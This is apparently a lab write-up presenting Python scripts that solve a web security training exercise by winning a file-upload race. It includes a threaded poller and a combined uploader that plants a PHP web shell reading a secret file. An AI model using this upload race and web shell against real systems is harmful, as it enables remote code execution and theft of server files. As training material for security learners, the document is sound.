
Web shell upload via race condition

This post documents a Python script written for the lab "Lab: Web shell upload via race condition".

As stated above, the purpose of this post is to provide documentation for the Python script. The lab has an official solution, but it relies on the Burp Suite Turbo Intruder extension, and every write-up I found after searching follows the same approach the solution suggests. I think a hand-written Python script solves it more simply and is good Python practice at the same time, so I want to offer a different approach here.

By the way, what the official solution provides is in fact also a Python script (Turbo Intruder scripts are written in Python).

The Python script only needs to keep sending GET requests to the host for the uploaded file and pick out the responses with status code 200. One point matters for timing: the lab's server validates the file after writing it to disk and deletes it when validation fails, so a 200 can only come back during that brief window. The script therefore has to be polling already while the upload request is in flight, and the upload may need to be submitted more than once.

This uses the Python Requests library:

```bash
python -m pip install requests
```

First upload a normal image to see which directory avatars land in: files/avatars/Lenna_(test_image).png

My first version of the code produced no result; I suspect Python isn't sending requests fast enough (?). One contributing factor is that each bare `requests.get` opens a fresh HTTPS connection, so every poll pays for a full TLS handshake.

```python
import requests


def request():
    path = "/files/avatars/exploit.php"
    url = "https://xxxx.web-security-academy.net"
    while True:
        # Poll the uploaded shell; it only exists during the race window.
        response = requests.get(url + path)
        if response.status_code == requests.codes.ok:
            print(response.text)


if __name__ == "__main__":
    request()
```

Looking at other people's code, I wondered whether I could open a few threads.
Brute force it: I opened seven threads.

```python
import requests
import threading


def request():
    path = "/files/avatars/exploit.php"
    url = "https://xxxxx.web-security-academy.net"
    while True:
        # Poll the uploaded shell; it only exists during the race window.
        response = requests.get(url + path)
        if response.status_code == requests.codes.ok:
            print(response.text)


if __name__ == "__main__":
    # Seven pollers hammer the path in parallel to land inside the window.
    threads = [threading.Thread(target=request) for _ in range(7)]
    for thread in threads:
        thread.start()
```
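The scripts above only cover the "hammer the URL" half of the race; the upload itself is sent separately. The following is an added example (my own code, not the lab's official solution and not the scripts above) that does both from one process: it starts the pollers first, then fires the upload, and stops at the first 200. The race loop takes two callables so it can be run offline against a constructed `SimulatedTarget`; `make_lab_target` wires it to the real lab, where the endpoint `/my-account/avatar`, the `avatar`/`user`/`csrf` form fields, the `wiener` user and the `/home/carlos/secret` payload are assumptions taken from a typical capture of this lab, not facts stated on this page. The `xxxx` host, session cookie and CSRF token are yours to fill in from Burp.

```python
import threading
import time
from typing import Callable, List, Optional, Tuple

# A fetch returns (status_code, body); an upload submits the web shell once.
Fetch = Callable[[], Tuple[int, str]]
Upload = Callable[[], None]


def race_for_webshell(upload: Upload, fetch: Fetch, workers: int = 7,
                      attempts: int = 5, grace: float = 0.5) -> Optional[str]:
    """Poll the shell's URL from `workers` threads while the upload is in flight.

    The uploaded file only exists between the server writing it and the
    validation step deleting it, so the pollers are started *before* each
    upload and keep going until one of them gets a 200 or `attempts` runs out.
    Returns the body of the first 200 response (the shell's output) or None.
    """
    found: List[str] = []
    stop = threading.Event()

    def poll() -> None:
        while not stop.is_set():
            status, body = fetch()
            if status == 200:
                found.append(body)
                stop.set()

    pollers = [threading.Thread(target=poll, daemon=True) for _ in range(workers)]
    for t in pollers:
        t.start()
    try:
        for _ in range(attempts):
            upload()                # the race window opens during this call
            if stop.wait(grace):    # a poller landed inside the window
                break
    finally:
        stop.set()                  # release the pollers even if upload() raised
        for t in pollers:
            t.join()
    return found[0] if found else None


class SimulatedTarget:
    """Constructed stand-in for the lab server so the race logic runs offline:
    the upload writes the file, 'validates' for `window` seconds, then deletes it."""

    def __init__(self, window: float = 0.1, secret: str = "carlos-secret"):
        self.window = window
        self.secret = secret
        self._present = threading.Event()

    def upload(self) -> None:
        self._present.set()          # file written under /files/avatars/ ...
        time.sleep(self.window)      # ... validation runs ...
        self._present.clear()        # ... and the file is removed

    def fetch(self) -> Tuple[int, str]:
        if self._present.is_set():
            return 200, self.secret  # the PHP ran and printed the secret
        return 404, "Not Found"


def make_lab_target(base_url: str, session_cookie: str, csrf: str,
                    shell_name: str = "exploit.php",
                    php: str = '<?php echo file_get_contents("/home/carlos/secret"); ?>'):
    """Build (upload, fetch) against the real lab. The endpoint, the form fields
    and the payload are assumptions from a typical capture (POST /my-account/avatar
    with avatar/user/csrf); check them against your own request in Burp."""
    import requests  # imported here so the race logic above stays network-free

    session = requests.Session()    # pooled connections: no TLS handshake per poll
    session.cookies.set("session", session_cookie)

    def upload() -> None:
        session.post(base_url + "/my-account/avatar",
                     files={"avatar": (shell_name, php, "application/x-php")},
                     data={"user": "wiener", "csrf": csrf}, timeout=10)

    def fetch() -> Tuple[int, str]:
        r = session.get(base_url + "/files/avatars/" + shell_name, timeout=10)
        return r.status_code, r.text

    return upload, fetch


if __name__ == "__main__":
    target = SimulatedTarget()
    print(race_for_webshell(target.upload, target.fetch, workers=7))
```

Against the lab, swap the simulated target for `make_lab_target("https://xxxx.web-security-academy.net", session_cookie, csrf)`. Keep `workers` modest: the pollers serialize on the GIL anyway, and a single `requests.Session` with its connection pool matters more than thread count because it removes the per-request TLS handshake of a bare `requests.get` loop.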